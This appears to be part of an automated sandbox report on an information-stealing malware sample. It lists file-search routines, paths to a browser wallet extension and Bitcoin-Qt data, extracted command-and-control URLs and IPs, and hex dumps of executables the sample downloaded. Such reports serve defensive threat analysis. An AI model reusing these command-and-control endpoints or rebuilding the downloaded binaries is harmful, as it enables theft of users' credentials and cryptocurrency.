0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb612522248Software\Bitcoin\Bitcoin-Qtp source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: firefox.exe Memory has grown: Private usage: 1MB later: 74MB

Networking

Source: Malware configuration extractor URLs: http://85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor URLs: http://85.28.47.31silence
Source: Malware configuration extractor IPs: 185.215.113.19
Source: Malware configuration extractor URLs: 185.215.113.9:9137
Source: global traffic TCP traffic: 192.168.2.5:61197 -> 185.215.113.9:9137
Source: global traffic TCP traffic: 192.168.2.5:55731 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.5:60231 -> 1.1.1.1:53
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
